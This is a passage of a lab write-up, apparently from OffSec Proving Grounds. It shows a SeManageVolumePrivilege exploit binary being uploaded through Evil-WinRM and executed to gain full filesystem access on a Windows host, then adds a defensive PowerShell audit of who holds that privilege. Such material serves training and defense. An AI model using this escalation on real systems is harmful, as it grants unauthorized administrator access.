SeManageVolumePrivilege


The svc_mssql account holds SeManageVolumePrivilege, which can be abused for privilege escalation.

*Evil-WinRM* PS C:\tmp> upload SeManageVolumeExploit.exe
 
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/SeManageVolumeExploit.exe to C:\tmp\SeManageVolumeExploit.exe
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!

Delivery complete

PS C:\tmp> .\SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
Entries changed: 1025
DONE 

Executing the exploit

PS C:\tmp> tree /F /A C:\Users\Administrator
tree /F /A C:\Users\Administrator
Folder PATH listing
Volume serial number is 4CB9-C891
C:\USERS\ADMINISTRATOR
+---3D Objects
+---Contacts
+---Desktop
|       email.txt
|       proof.txt
|       
+---Documents
|   +---SQL Server Management Studio
|   |   \---Code Snippets
|   |       \---SQL
|   |           \---My Code Snippets
|   \---Visual Studio 2017
|       \---Templates
|           +---ItemTemplates
|           |   +---JavaScript
|           |   \---TypeScript
|           \---ProjectTemplates
|               +---JavaScript
|               \---TypeScript
+---Downloads
+---Favorites
|   |   Bing.url
|   |   
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|       
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos

Now I have read and write access to the entire filesystem.
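
As an added defensive check that is not part of the original write-up, the following PowerShell function lists which principals hold SeManageVolumePrivilege on a host and flags any besides BUILTIN\Administrators, the Windows default holder of this right. The function name Get-ManageVolumeHolder and the temp-file name are assumptions made for this example; run it from an elevated prompt.

```powershell
# Added example: audit who holds SeManageVolumePrivilege in local security policy.
# Get-ManageVolumeHolder is a hypothetical helper name, not a built-in cmdlet.
function Get-ManageVolumeHolder {
    $adminSid = 'S-1-5-32-544'   # well-known SID of BUILTIN\Administrators
    $inf = Join-Path $env:TEMP ('user_rights_{0}.inf' -f [guid]::NewGuid())
    try {
        # Export only the user-rights section of the effective local policy.
        secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "secedit export failed ($LASTEXITCODE)" }

        # Expected form: SeManageVolumePrivilege = *S-1-5-32-544,*S-1-5-21-...
        $line = Get-Content -Path $inf |
            Where-Object { $_ -match '^\s*SeManageVolumePrivilege\s*=' } |
            Select-Object -First 1
        if (-not $line) { return }   # right is assigned to nobody

        $entries = ($line -split '=', 2)[1] -split ',' |
            ForEach-Object { $_.Trim() } | Where-Object { $_ }

        foreach ($entry in $entries) {
            $sid = $null; $name = $null
            try {
                if ($entry.StartsWith('*')) {
                    # secedit writes SIDs with a leading asterisk.
                    $sid  = [System.Security.Principal.SecurityIdentifier]::new($entry.TrimStart('*'))
                    $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
                } else {
                    # Some entries are written as plain account names.
                    $name = $entry
                    $sid  = [System.Security.Principal.NTAccount]::new($entry).Translate(
                                [System.Security.Principal.SecurityIdentifier])
                }
            } catch {
                # Orphaned SID or unknown name: report what the policy file contained.
                if (-not $name) { $name = '<unresolved>' }
            }
            [pscustomobject]@{
                Principal   = $name
                Sid         = if ($sid) { $sid.Value } else { $entry }
                NeedsReview = (-not $sid) -or ($sid.Value -ne $adminSid)
            }
        }
    } finally {
        Remove-Item -Path $inf -ErrorAction SilentlyContinue
    }
}

Get-ManageVolumeHolder | Format-Table -AutoSize
```

On the host in this write-up, the svc_mssql account would appear in the output with NeedsReview set to True.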